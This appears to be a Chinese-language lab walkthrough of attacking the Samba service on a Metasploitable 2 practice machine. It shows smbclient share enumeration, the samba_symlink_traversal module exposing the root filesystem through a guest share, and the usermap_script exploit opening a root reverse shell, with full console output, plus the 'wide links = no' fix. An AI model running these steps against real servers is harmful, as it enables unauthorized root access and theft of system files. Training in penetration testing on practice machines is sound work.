Metasploit2: tcp port 139/445 – Samba smbd
Metasploit2: tcpport 139 – netbios-ssn |
Windows系统开启139端口, 可用工具psshutdown.exe远程关闭电脑. Samba 可运行在Microsoft Windows外的系统, 例如: UNIX, Linux, IBM System, OpenVMS和其他的系统.Samba 使用的是TCP/IP协议. 它允许主机与Windows客户端或服务器交互, 表现的好像是一个文件或打印服务器. Smbd 是Samba的一部分, 也是服务守护进程, 主要用于提供文件共享与打印机服务, 客户端需要使用SMB协议. 我们可以使用smbclient去浏览Samba服务器. |
root@gnu:~# smbclient -U root -L 192.168.1.111 Enter root's password: Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers tmp Disk oh noes! opt Disk IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)) Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] Server Comment --------- ------- KEE-4 METASPLOITABLE metasploitable server (Samba 3.0.20-Debian) WIN-01406122018 WIN-V300QDH8H0C Workgroup Master --------- ------- WORKGROUP METASPLOITABLE |
root@gnu:~# smbclient -U root //192.168.1.111/tmp Enter root's password: Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] smb: \> ls . D 0 Tue Jul 29 11:28:03 2014 .. DR 0 Sun May 20 14:36:12 2012 .ICE-unix DH 0 Tue Jul 29 20:46:47 2014 .X11-unix DH 0 Tue Jul 29 08:47:57 2014 .X0-lock HR 11 Tue Jul 29 08:47:57 2014 4464.jsvc_up R 0 Tue Jul 29 08:48:12 2014 56891 blocks of size 131072. 42371 blocks available smb: \> get get <filename> [localname] smb: \> get 4464.jsvc_up NT_STATUS_ACCESS_DENIED opening remote file \4464.jsvc_up |
一个叫kcopedarookie的用户, 在youtube上发了一个0day的视频. 视频里面使用smbclient下载了/etc/passwd. 这是由于默认配置不安全导致的. 在smb.conf配置中, 设置wide links = no, 重启smbd修复问题. |
msf auxiliary(samba_symlink_traversal) > show options Module options (auxiliary/admin/smb/samba_symlink_traversal): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.111 yes The target address RPORT 445 yes Set the SMB service port SMBSHARE tmp yes The name of a writeable share on the server SMBTARGET rootfs yes The name of the directory that should point to the root filesystem msf auxiliary(samba_symlink_traversal) > run |
上面这个问题的产生是因为两个特性遇到了一块, 它们两个对管理员而言都很有用, 如果放到一块, 登录用户就有权访问系统上的任何文件. 默认 Samba 使用 “wide links = yes”, 可以让管理员在共享位置添加软链接, 这样客户端就可以访问. 例如: [tmp] path = /tmp read only = no guest ok = yes 管理员可以添加一个链接: ln -s /etc/passwd /tmp/passwd SMB/CIFS 客户端可以看到一个名为”passwd”的文件 |
root@gnu:~# smbclient -U root //192.168.1.111/tmp Enter root's password: Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] smb: \> ls . D 0 Tue Jul 29 11:48:25 2014 .. DR 0 Sun May 20 14:36:12 2012 .ICE-unix DH 0 Tue Jul 29 20:46:47 2014 .X11-unix DH 0 Tue Jul 29 08:47:57 2014 .X0-lock HR 11 Tue Jul 29 08:47:57 2014 4464.jsvc_up R 0 Tue Jul 29 08:48:12 2014 rootfs DR 0 Sun May 20 14:36:12 2012 56891 blocks of size 131072. 42371 blocks available smb: \> get 4464.jsvc_up NT_STATUS_ACCESS_DENIED opening remote file \4464.jsvc_up smb: \> cd rootfs\ smb: \rootfs\> ls . DR 0 Sun May 20 14:36:12 2012 .. DR 0 Sun May 20 14:36:12 2012 initrd DR 0 Tue Mar 16 18:57:40 2010 media DR 0 Tue Mar 16 18:55:52 2010 bin DR 0 Sun May 13 23:35:33 2012 lost+found DR 0 Tue Mar 16 18:55:15 2010 mnt DR 0 Wed Apr 28 16:16:56 2010 sbin DR 0 Sun May 13 21:54:53 2012 initrd.img R 7929183 Sun May 13 23:35:56 2012 home DR 0 Fri Apr 16 02:16:02 2010 lib DR 0 Sun May 13 23:35:22 2012 usr DR 0 Wed Apr 28 00:06:37 2010 proc DR 0 Tue Jul 29 20:46:33 2014 root DR 0 Tue Jul 29 08:47:57 2014 sys DR 0 Tue Jul 29 20:46:34 2014 boot DR 0 Sun May 13 23:36:28 2012 nohup.out R 8705 Tue Jul 29 08:47:57 2014 etc DR 0 Tue Jul 29 08:47:53 2014 dev DR 0 Tue Jul 29 20:46:48 2014 vmlinuz R 1987288 Thu Apr 10 12:55:41 2008 opt DR 0 Tue Mar 16 18:57:39 2010 var DR 0 Sun May 20 17:30:19 2012 cdrom DR 0 Tue Mar 16 18:55:51 2010 tmp D 0 Tue Jul 29 11:48:25 2014 srv DR 0 Tue Mar 16 18:57:38 2010 56891 blocks of size 131072. 42371 blocks available |
我们可以使用usermap_script攻击模块获取一个Samba的shell. |
msf > use exploit/multi/samba/usermap_script msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Exploit target: Id Name -- ---- 0 Automatic msf exploit(usermap_script) > set RHOST 192.168.1.111 RHOST => 192.168.1.111 msf exploit(usermap_script) > run [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 7UDa3hwWyQYwH9FP; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "7UDa3hwWyQYwH9FP\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.1.113:4444 -> 192.168.1.111:47271) at 2014-07-29 23:49:04 -0400 id uid=0(root) gid=0(root) |
Metasploit2: tcp port 139/445 – Samba smbd相关推荐
- Windows 中 TCP 端口 139 和 445 的使用
Microsoft 在 Windows 2000 中引入了 TCP 端口 445,它仍在 Windows 10 和 Windows Server 2019 中使用.我将解释此端口的用途,以及它与 Wi ...
- 在Windows中使用TCP端口139和445
Windows中使用TCP端口139和445 139端口和445端口的作用 139端口与445端口的区别 关闭139端口和445端口的方法 总结 Microsoft在Windows 2000中引入了T ...
- Citrix 整体架构 端口列表 Tcp Port
补充Terminal Services Licensing/RDS Licensing 端口: RPC TCP 135 137 138 139 445 1024-65535 Randomly allo ...
- Symantec赛门铁克企业版本防火墙怎么防止勒索病毒Symantec赛门铁克关闭137,138,139,445端口
Symantec赛门铁克企业版本防火墙怎么防止勒索病毒Symantec赛门铁克关闭137,138,139,445端口 我是否受到WannaCry勒索软件的保护? Symantec Data Cent ...
- 137/138/139/445端口
同属于UDP端口,用于提供netbios服务,此服务用于提供计算机名称的查询 使用者通过向某台计算机的137端口发起一个请求,就可以获取该计算机的名称.注册用户名,以及是否安装主域控制器.IIS是否运 ...
- 【翻译自mos文章】OGG replicat 进程使用的 TCP port
OGG replicat 进程使用的 TCP port 来源于: TCP PORT USED BY REPLICAT PROCESSES (文档 ID 1060954.1) 适用于: Oracle G ...
- setprop service.adb.tcp.port 5555
解决方案: 通过USB线连接安卓机和电脑 确保安卓系统中的开发者选项打开,USB调试项也是是开启的 通过cmd打开命令行窗口界面,输入adb devices 能看到所连接的设备情况下 adb root ...
- 用策略屏蔽135 139 445 3389端口+网络端口安全防护技
默认情况下,Windows有很多端口是开放的,在你上网的时候,网络病毒和黑客可以通过这些端口连上你的电脑.为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135.139.445.593. ...
- 135.137.138.139.445端口分析
无论你的服务器中安装的是Windows 2000 Server,还是Windows Server 2003,它们无一例外会在默认安装下开通135端口.137端口.138端口.139端口和445端口.这 ...
- win server服务器 关闭危险端口 135,137,138,139,445的方法
Windows默认开放135.137.138.139和445五个端口,都与文件共享和打印机共享有关的,若机器连接网络后会在用户不知道的情况下泄露本机部分信息,这样会给用户带来一部分危险,所以我们在工作 ...
最新文章
- Ubuntu中设置防火墙的开启与关闭
- 前端学习(1337):mongoDB文档查询
- 查询MySQL字段注释的 5 种方法!
- 临时文件_Go语言学习基础-文件路径、目录、临时文件和目录
- 提高篇 第五部分 动态规划 第1章 区间类动态规划
- java学习避免死锁
- 我的docker随笔25:一个测试用的镜像制作过程
- 收购小蓝单车部分资产、与ofo蜜月期结束,滴滴重构共享单车布局
- 软件测试工作中的沟通问题
- HDU 4379 水题,大水,但我WA了很多次,做了很久
- html文件用excel打开乱码,都是兼容惹的祸 用excel打开xls文件出现乱码的解决方法...
- 读书笔记:Hadoop权威指南 简介
- 2018年人工智能之自动驾驶研究报告
- Panel 控件概述(Windows 窗体)
- 计算机信息安全相关文献,优秀计算机信息安全论文参考文献 计算机信息安全外文文献怎么找...
- POJ 1179 Polygon
- 用python计算有效前沿_【投资组合理论】Python绘制上证50成分股有效前沿和CML
- 安视宝动态微表情人脸识别技术
- ppt演讲计时器_速来!提前面试PPT演讲干货!
- 【CICE-A7a】人身保险会计与财务(上)